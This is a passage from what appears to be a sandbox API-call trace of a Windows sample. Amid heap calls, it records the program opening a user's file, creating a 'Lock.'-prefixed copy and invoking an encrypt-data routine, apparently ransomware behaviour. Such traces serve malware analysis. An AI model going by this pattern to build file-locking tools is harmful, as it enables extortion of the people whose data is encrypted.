lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0222.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/6KDjX0CerhkJtgMw88.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\6kdjx0cerhkjtgmw88.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0222.571] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.571] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0222.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0222.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0222.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.571] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0222.572] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.6KDjX0CerhkJtgMw88.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.6kdjx0cerhkjtgmw88.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0222.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0222.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0222.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.578] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0222.578] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x8343, lpOverlapped=0x0) returned 1 [0222.582] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0222.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f24820 [0222.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0222.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f2cb70 [0222.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0222.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f24820 [0222.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0222.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.589] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0222.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f24820 [0222.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55098 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f34ec0 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0222.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0222.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0222.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0222.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0222.636] RtlAllocateHeap 